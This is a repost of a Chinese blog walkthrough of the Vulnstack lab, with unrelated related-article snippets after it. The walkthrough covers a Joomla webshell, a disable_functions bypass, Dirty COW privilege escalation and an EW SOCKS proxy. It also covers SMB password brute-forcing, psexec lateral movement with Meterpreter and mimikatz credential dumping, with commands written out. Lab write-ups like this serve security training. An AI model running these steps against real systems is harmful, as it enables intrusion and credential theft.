网站建设免费空间注册导航公司名称可以和网站域名不同吗

news/2025/9/30 9:58:50/文章来源:
网站建设免费空间注册导航,公司名称可以和网站域名不同吗,云南网站建设模块,wordpress增加关键词文章目录 环境配置靶场介绍靶场设置 外网渗透信息收集端口扫描目录扫描 漏洞发现与利用获取ssh账号密码#xff0c;登录centos 提权 内网渗透建立代理内网信息收集smb暴破#xff0c;获取本地管理员密码 横向移动使用psexec模块上线msf 环境配置 靶场介绍 靶场地址 http:/… 文章目录 环境配置靶场介绍靶场设置 外网渗透信息收集端口扫描目录扫描 漏洞发现与利用获取ssh账号密码登录centos 提权 内网渗透建立代理内网信息收集smb暴破获取本地管理员密码 横向移动使用psexec模块上线msf 环境配置 靶场介绍 靶场地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/打开虚拟机镜像为挂起状态第一时间进行快照部分服务未做自启重启后无法自动运行。 挂起状态账号已默认登陆centos为出网机第一次运行需重新获取桥接模式网卡ip。 除重新获取ip不建议进行任何虚拟机操作。 参考虚拟机网络配置添加新的网络该网络作为内部网络。 注名称及网段必须符合下面图片进行了固定ip配置。 靶场设置 网络配置要求攻击机kali为net8外网的centos其中一个为net8另一个net2 拓扑图这里我的kali为192.168.1.5 外网渗透 信息收集 端口扫描 使用nmap进行端口服务操作系统探测 nmap -sS -P0 -sV -O 192.168.1.110得到目标开放了2280和3306 访问一下目标的80端口看到是个joomla CMS搭建的网站脚本语言为php 目录扫描 dirb http://192.168.1.110/发现目标存在admin目录 访问一下是个后台的登录界面弱口令进不去 漏洞发现与利用 使用msf获取joomla cms相关信息 use auxiliary/scanner/http/joomla_version set rhosts http://192.168.1.110/ run得到具体版本,没啥用不能利用 上御剑扫一下后台发现一大堆东西 phpinfo() mysql配置信息 navicat远程连接mysql看到管理员密码被加密了 这里可以根据官方文档修改添加管理员账号密码 如何恢复或重置管理员密码 这里注意表的名字改成你自己的 登录后台 http://192.168.1.103/administrator/index.php  admin2  secretgetshell 点击 extensions--templates--templates--protostar details and files--index.php--save写入蚁剑shell 连接成功 命令执行发现用不了php开启了禁用函数 使用蚁剑插件绕过函数禁用 获取ssh账号密码登录centos 看下目录里面有没有有用的信息发现一个账号密码前期信息收集知道开放了22端口远程连接试一下 连接成功 提权 uname -r 发现linux内核版本很低可以用脏牛提权 https://github.com/imust6226/dirtcow靶机里vi dirty.c直接将上面dirty.c里的内容复制进去编译一下 gcc -pthread dirty.c -o dirty -lcrypt./dirty 123456  ---执行exp创建账户firefart密码123456切换到firefart账户获取root权限 内网渗透 建立代理 掏出祖传的EWearthworm上传到靶机并执行让靶机当做进入内网的跳板 kali里记得修改一下走靶机地址 vim /etc/proxychains.conf //配置proxychains将最后一行的socks4注释掉添加下面的行端口为跳板机上的ew监听的8888socks5 192.168.1.100 8888内网信息收集 直接上神器fscan 由此可以看出 已经拿到root权限的centos有两张网卡 一张是192.168.216.131 一张是192.168.93.100 Nginx代理服务器ubantu192.168.93.120 一台非TEST域内win7专业版主机192.168.93.30 一台TEST域内win2008主机192.168.93.20 一台TEST域控主机win server 2012192.168.93.10 还跑出来了疑似的SSH账号尝试登录发现不正确挂代理尝试登录 smb暴破获取本地管理员密码 这里我的字典里没有这个密码我手动加上去的2030都是这个密码 use auxiliary/scanner/smb/smb_login set rhosts 192.168.93.30 set smbuser administrator set pass_file top10k.txt run暴破密码administrator 123qwe!ASD 横向移动 使用psexec模块上线msf use exploit/windows/smb/psexec set rhost 192.168.93.30 set payload windows/meterpreter/bind_tcp set smbuser administrator set smbpass 123qwe!ASD run拿下win7 拿下win2008 接下来通过msf上传mimikatz进行密码读取 #提升权限 privilege::debug抓取密码 lsadump::lsa /patch

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/922677.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

做网站行业零代码开发平台

最近在看《设计模式与游戏完美开发》,文章将记录一些要点和一些设计模式实现 GoF定义的23种设计模式及应用场景 系统设计可以采用的设计模式:单例、状态(场景切换)、外观(保证高内聚)、中介者&#xff08…

缩放 div

缩放 div<!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0&q…

Redis从零讲解 - 详解

Redis从零讲解 - 详解2025-09-30 09:50 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-…

如何建设社区网站野花韩国视频在线观看免费高清

知识图谱&#xff1a;浙江大学教授 陈华军 知识图谱 1课时 http://openkg.cn/datasets-type/ 知识图谱的价值 知识图谱是有什么用&#xff1f; 语义搜索 问答系统 QA问答对知识图谱&#xff1a;结构化图 辅助推荐系统 大数据分析系统 自然语言理解 辅助视觉理解 例…

房地产行业网站开发网页界面设计公司

文章目录一、环境分布二、实战1. kafka下载2. 解压3. 配置4. 编写启动脚本5. 编写关闭脚本6. 赋予脚本可执行权限7. 脚本使用案例一、环境分布 软件版本jdk1.8kafkakafka_2.13-2.5.0 二、实战 kafka官网地址&#xff1a; http://kafka.apache.org/downloads 1. kafka下载 …

【2025-09-29】团队合作

20:00没有了家庭,在广大的宇宙间,人会冷得发抖。——安德烈莫罗阿今早比平时提前了15分钟出门送大宝上学。因为公司内部有个产品宣讲会议,时间定在9点半,刚好是我平时上班回到公司的时间。考虑到参会人员都是公司领…

淘宝客api网站架设教程建设公司门户网站

文章目录 一、单选题1、三次握手、四次挥手发生在网络模型的哪一层上&#xff1f;2、互联网Internet的拓扑结构是什么&#xff1f;3、以下哪一种网络设备是工作在网络层的&#xff1f;4、以下哪种关于分组交换网络的说法是错误的&#xff1f;5、以下哪种协议是在TCP/IP模型中的…

pg库支持扩展postgis

-- 在 psql 中启用 PostGIS 扩展 CREATE EXTENSION IF NOT EXISTS postgis; CREATE EXTENSION IF NOT EXISTS postgis_topology; -- 可选,用于拓扑操作

wordpress 忘记用户名重庆网站建设推广优化

一、考点分布 软件架构的概念&#xff08;※※※&#xff09;基于架构的软件开发&#xff08;※※※※&#xff09;软件架构风格&#xff08;※※※※※&#xff09;特定领域软件架构&#xff08;※※※&#xff09;软件质量属性&#xff08;※※※※※&#xff09;软件架构评估…

濮阳建设工程网站公司单位电话号码大全

Spring Boot 源码学习系列 初识 SpringApplication 引言往期内容主要内容1. Spring Boot 应用程序的启动2. SpringApplication 的实例化2.1 构造方法参数2.2 Web 应用类型推断2.3 加载 BootstrapRegistryInitializer2.4 加载 ApplicationContextInitializer2.5 加载 Applicatio…

kuboard部署启用3个etcd(k8s单个master)

环境:OS:Centos 7拓扑:1master 2nodes1.node节点打标签在集群中 Master Role 节点不足3个个时, 需要在 worker 节点添加 k8s.kuboard.cn/role=etcd 的标签,使etcd最少为奇数3个节点。 查看当前的集群环境[root@maste…

odoo18应用、队列服务器分离(SSHFS) - 详解

odoo18应用、队列服务器分离(SSHFS) - 详解2025-09-30 09:33 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: b…

数据库服务分布架构(MyCAT)

数据库服务分布架构(MyCAT)1.18.1数据库服务分布架构概述介绍分布式架构理念:(基于业务逻辑分布式/基于程序逻辑分布式)●架构演变过程早期,为了满足主要业务功能需求,可以将所有程序部署在一个服务器节点上;架构…

题解:P14038 [PAIO 2025] Adventure Plan

P14038:差分约束、最短路、负环。第一次给官方比赛投题,来写发题解 /se 子任务 \(1,3,4\) 随便乱做就好了,没啥技术含量。 设 \(x_u\) 表示从 \(0\) 到 \(u\) 路径的长度,那么一条有向边 \(u\stackrel{[l,r]}{\to}…

20231414_王仕琪_密码技术密码杂凑算法学习笔记

20231414_王仕琪_密码技术密码杂凑算法学习笔记

网站备案关闭网站高性能网站开发 书籍

在数字化时代&#xff0c;数据存储的重要性不言而喻。然而&#xff0c;有时候我们会遭遇一些意想不到的困扰&#xff0c;比如存储在D盘的数据突然消失。这不仅可能导致重要文件的丢失&#xff0c;还可能影响我们的工作和生活。本文将探讨D盘数据消失的可能原因&#xff0c;提供…

做一家网站需要多少钱网站建设和app开发

函数是对程序逻辑进行结构化或过程化的一种编程方法。能将整块代码巧妙地隔离成易于管理 的小块&#xff0c;把重复代码放到函数中而不是进行大量的拷贝--这样既能节省空间&#xff0c;也 有助于保持一致性&#xff0c;因为你只需改变单个的拷贝而无须去寻找再修改大量复制代码…

租赁服务器做电影网站网站开发的税率

1、链接测试&#xff1a;a:进入页面后点击链接是否正常跳转 b:单独将链接复制到浏览器里面是否正常展示页面&#xff08;如果需要登录的网站&#xff0c;还需要考虑个人中心等需要登录的功能在未登录成功时以及登录成功后直接通过链接打开的情况&#xff09; 2、菜单测试&#…

做宠物服务的相关网站简单的购物网站设计

转载自 关于Spring底层原理面试的那些问题&#xff0c;你是不是真的懂Spring&#xff1f; 1.什么是 Spring 框架&#xff1f;Spring 框架有哪些主要模块&#xff1f; Spring 框架是一个为 Java 应用程序的开发提供了综合、广泛的基础性支持的 Java 平台。Spring帮助开发者解…